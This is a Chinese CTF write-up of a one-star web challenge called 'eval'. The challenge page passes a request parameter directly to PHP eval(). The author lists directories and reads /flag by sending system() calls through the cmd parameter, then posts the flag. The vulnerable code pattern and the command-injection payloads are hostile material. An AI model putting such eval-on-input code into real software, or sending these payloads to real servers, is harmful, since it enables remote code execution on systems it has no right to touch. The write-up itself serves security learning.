青少年CTF-qsnctf-Web-eval

发布时间:2023年12月21日

题目环境:
image.png

出题人:末心
题目难度:★
题目描述:Eval是个什么呢,flag格式为:qsnctf{xxx}。

做道末心师傅出的题啦😉

image.png

<?php
highlight_file(__FILE__);
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
}
?>
  • 给了一个参数cmd
  • 这个参数cmd存在外部执行漏洞

补充:
system是外部命令执行函数

列出此路径下的目录和文件
?cmd=system("ls");
image.png

有回显结果!

列出根目录下的目录和文件
?cmd=system("ls /");
image.png

发现了flag的存在!

查看flag的内容
?cmd=system("cat /flag");
image.png
得到flag:
qsnctf{4e90381c-e0b6-4608-a7c7-8cddc0f1b594}

文章来源:https://blog.csdn.net/m0_73734159/article/details/135135221
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。